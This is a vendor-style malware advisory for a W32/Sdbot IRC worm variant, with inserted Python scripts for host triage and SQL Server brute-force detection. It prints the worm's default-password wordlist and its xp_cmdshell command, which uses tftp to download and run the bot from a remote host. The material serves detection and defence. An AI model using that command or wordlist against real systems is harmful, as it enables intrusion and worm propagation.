W32/Sdbot.worm!54D1EEB9

Type
Internet Worm
SubType
Internet Relay Chat Worm
Discovery Date
04/25/2008
Length
102,376 bytes
Minimum DAT
5284 (04/29/2008)
Updated DAT
5291 (05/08/2008)
Minimum Engine
5.1.00
Description Added
04/25/2008
Description Modified
04/25/2008 9:46 AM (PT)
Risk Assessment
Corporate User
Low
Home User
Low

Characteristics

This is a variant of W32/Sdbot.worm which bears strong resemblance to the many other members of this rapidly growing family.

It bears the following characteristics:

  • propagates to machines vulnerable to the following exploits:
  • propagates to machines with poorly secured network shares (weak username/password combinations)
  • propagates to MySQL and Microsoft SQL servers that are poorly secured (again weak username/password combinations)
  • propagates to remote machines (it generates random IPs) by attempting to copy itself to a number of shares
  • provides a backdoor to the victim machine, thereby compromising data on that machine (significant remote access functionality is available to the hacker)

Symptoms

When run, the bot installs itself into the Windows system directory using a random filename, for example:

  • C:\WINDOWS\system32\jkslnwyzs.exe

It adds itself as a service on the victim machine, with the service configuration data stored within the following keys:

  • HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\Run "Microsoft Getway Dire"
  • HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\RunServices "Microsoft Getway Dire"

The bot attempts to connect to a remote IRC server on TCP destination port 9682. Users should note that the bot can be instructed to update, which will almost certainly result in the bot connecting to a different server, and on a different port.

The server it attempts to connect to is:

  • trying.q8[removed].org

Other symptoms include:

  • opening of local TCP port 113

Removal of shares on the victim machine:

  • admin$
  • ipc$
  • d$
  • c$
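
An offline triage check for the symptoms above, as an added example that is not part of the original description: it parses "reg query", "netstat -an" and "net share" output collected from a suspect host and flags the Run-key value name, the local port 113 listener, established connections to port 9682, and missing default shares. The sample outputs are constructed for the example (not captured from a real infection), and the function names are this example's own.

```python
"""Offline triage for the host symptoms listed above, run over command output
collected from a suspect host. The sample outputs below are constructed for
this example (modelled on reg query, netstat -an and net share), not captured
from a real infection."""
import re

# Run-key value name reported on the page; the executable name is random per infection.
SDBOT_RUN_VALUE = "Microsoft Getway Dire"
# Port the page reports the bot opening locally, and the IRC port it connects out to.
IDENT_PORT = 113
IRC_PORT = 9682
# Default shares the page reports the bot removing (d$ only exists when a D: volume does).
DEFAULT_SHARES = {"admin$", "ipc$", "c$", "d$"}

# Constructed sample output (key path follows the page's wording).
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\Software\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Microsoft Getway Dire    REG_SZ    C:\WINDOWS\system32\jkslnwyzs.exe
"""

# Constructed sample output: port 113 listening, one connection out to port 9682.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:113            0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1045      203.0.113.7:9682       ESTABLISHED
"""

# Constructed sample output: the administrative shares are gone.
SAMPLE_NET_SHARE = r"""
Share name   Resource                        Remark
-------------------------------------------------------------------------------
Public       C:\Users\Public
"""

REG_VALUE_RE = re.compile(r"^\s+(.+?)\s+(REG_[A-Z_]+)\s+(.*)$")
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)")


def run_key_entries(reg_output):
    """Parse reg query output into (value_name, data) pairs."""
    entries = []
    for line in reg_output.splitlines():
        m = REG_VALUE_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(3).strip()))
    return entries


def suspicious_run_entries(reg_output):
    """Run-key entries whose value name matches the one the page reports."""
    return [(n, d) for n, d in run_key_entries(reg_output) if n == SDBOT_RUN_VALUE]


def _port(addr):
    # Works for both "1.2.3.4:80" and "[::]:80".
    return int(addr.rsplit(":", 1)[1])


def listening_ports(netstat_output):
    """Set of local TCP ports in LISTENING state."""
    ports = set()
    for line in netstat_output.splitlines():
        m = NETSTAT_RE.match(line)
        if m and m.group(3) == "LISTENING":
            ports.add(_port(m.group(1)))
    return ports


def outbound_to_port(netstat_output, port):
    """Remote endpoints of ESTABLISHED connections to the given destination port."""
    return [m.group(2) for m in map(NETSTAT_RE.match, netstat_output.splitlines())
            if m and m.group(3) == "ESTABLISHED" and _port(m.group(2)) == port]


def missing_default_shares(net_share_output):
    """Default shares that no longer appear in net share output."""
    present = set()
    for line in net_share_output.splitlines():
        if not line.strip() or line.startswith(("Share name", "---")):
            continue
        present.add(line.split()[0].lower())
    return DEFAULT_SHARES - present


def triage(reg_output, netstat_output, net_share_output):
    """Combine the individual checks into one findings dict."""
    return {
        "run_entries": suspicious_run_entries(reg_output),
        "ident_port_open": IDENT_PORT in listening_ports(netstat_output),
        "irc_peers": outbound_to_port(netstat_output, IRC_PORT),
        "missing_shares": missing_default_shares(net_share_output),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REG, SAMPLE_NETSTAT, SAMPLE_NET_SHARE).items():
        print(f"{key}: {value}")
```

Any one finding on its own is weak evidence (port 113 is also opened by legitimate ident daemons, and shares can be removed by policy); the combination of a matching Run-key value, a listener on 113, an outbound IRC connection and missing default shares is what makes the host worth isolating and collecting the referenced executable from.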

Method of Infection

W32/Sdbot.worm!54D1EEB9 scans for vulnerable machines on the network, and uses the following Microsoft vulnerabilities to spread.

The bot scans for computers with an exposed port 1433 (the default MS SQL Server port) and attempts to create an SQL connection to that port. It tries to log on with the following username and password combinations:

12345
123456
1234567
12345678
123456789
1234567890
access
accounting
accounts
admin
administrador
administrat
administrateur
administrator
admins
backup
bitch
blank
brian
changeme
chris
cisco
compaq
control
database
databasepass
databasepassword
db1234
dbpass
dbpassword
default
domain
domainpass
domainpassword
exchange
george
guest
hello
homeuser
internet
internet
intranet
katie
linux
login
loginpass
nokia
oeminstall
oemuser
office
oracle
orainstall
outlook
pass1234
passwd
password
password1
peter
peter
qwerty
server
siemens
sqlpassoainstall
staff
student
susan
system
teacher
technical
win2000
win2k
win98
windows
winnt
winpass
winxp

If authentication is successful and the compromised SQL account has sufficient rights, the bot connects using the following connection string and issues the following SQL query, which uses xp_cmdshell to run "tftp.exe" to download and execute a copy of the bot:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit
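
Detection logic for the password-guessing behaviour above, as an added example that is not part of the original description: it reads SQL Server ERRORLOG lines and reports clients with a burst of failed logins, a later successful login from the same client, and the xp_cmdshell configuration change that the bot's command depends on. The log lines are constructed for this example (modelled on the SQL Server 2005-style ERRORLOG layout), and the thresholds and function names are this example's own choices.

```python
"""Detect the SQL Server password-guessing pattern described above in an
ERRORLOG extract. The log lines are constructed for this example, modelled on
the SQL Server 2005-style ERRORLOG format, and are not from a real server."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a burst of failed logins from one client, a success from the
# same client, then xp_cmdshell being switched on (needed before tftp can be run
# through it), plus one unrelated failure from another client.
SAMPLE_ERRORLOG = """\
2008-04-25 10:15:01.20 Logon       Login failed for user 'admin'. [CLIENT: 203.0.113.7]
2008-04-25 10:15:01.45 Logon       Login failed for user 'administrator'. [CLIENT: 203.0.113.7]
2008-04-25 10:15:01.98 Logon       Login failed for user 'guest'. [CLIENT: 203.0.113.7]
2008-04-25 10:15:02.33 Logon       Login failed for user 'oracle'. [CLIENT: 203.0.113.7]
2008-04-25 10:15:02.70 Logon       Login failed for user 'sa'. [CLIENT: 203.0.113.7]
2008-04-25 10:15:03.10 Logon       Login failed for user 'sa'. [CLIENT: 203.0.113.7]
2008-04-25 10:15:03.55 Logon       Login succeeded for user 'sa'. Connection: non-trusted. [CLIENT: 203.0.113.7]
2008-04-25 10:15:04.02 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2008-04-25 11:02:17.40 Logon       Login failed for user 'app_user'. [CLIENT: 192.0.2.25]
""".splitlines()

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d)\s+(\S+)\s+(.*)$")
FAIL_RE = re.compile(r"Login failed for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
SUCCESS_RE = re.compile(r"Login succeeded for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
XPCMD_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


def parse_errorlog(lines):
    """Yield (timestamp, source, message) for lines that match the ERRORLOG layout."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m.group(2), m.group(3)


def analyze(lines, threshold=5, window=timedelta(minutes=1)):
    """Flag clients with >= threshold failed logins inside any sliding window,
    successes from those clients after the burst began, and xp_cmdshell enablement."""
    failures = defaultdict(list)   # client -> [(ts, user)]
    successes = defaultdict(list)  # client -> [(ts, user)]
    xp_enabled = []
    for ts, _, msg in parse_errorlog(lines):
        f = FAIL_RE.search(msg)
        if f:
            failures[f.group(2)].append((ts, f.group(1)))
            continue
        s = SUCCESS_RE.search(msg)
        if s:
            successes[s.group(2)].append((ts, s.group(1)))
            continue
        if XPCMD_RE.search(msg):
            xp_enabled.append(ts)

    bruteforce = {}
    for client, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until the oldest event fits inside the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                bruteforce[client] = {
                    "failures": len(events),
                    "first_seen": events[0][0],
                    "users": sorted({u for _, u in events}),
                }
                break

    success_after = {}
    for client, info in bruteforce.items():
        users = sorted({u for ts, u in successes.get(client, []) if ts > info["first_seen"]})
        if users:
            success_after[client] = users

    return {
        "bruteforce": bruteforce,
        "success_after_bruteforce": success_after,
        "xp_cmdshell_enabled_at": xp_enabled,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_ERRORLOG).items():
        print(f"{key}: {value}")
```

The "Login succeeded" line only appears when login auditing is set to record successful as well as failed logins, so that setting is worth enabling on any instance reachable on port 1433; the configuration-change message for xp_cmdshell is the higher-confidence signal, since a freshly compromised account has no other reason to turn it on.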

  • Weak password exploitation of network shares

The bot attempts to spread by finding improperly secured NetBIOS shares. It attempts to connect to computers with shared drives and tries the above-listed password combinations.

Removal

Detection is included in our BETA DAT files and will also be included in the next scheduled DAT release. In addition to the DAT version requirements for detection, the specified engine version (or greater) must also be used.

Additional Windows ME/XP removal considerations

Variants

N/A

Overview

W32/Sdbot.worm!54D1EEB9 is an Internet Relay Chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDoS attack on internet systems.

There are multiple versions of the W32/Sdbot family of worms that use IRC (Internet Relay Chat) as a command and control mechanism. Such worms typically use exploits and weak passwords to spread to vulnerable machines on the network.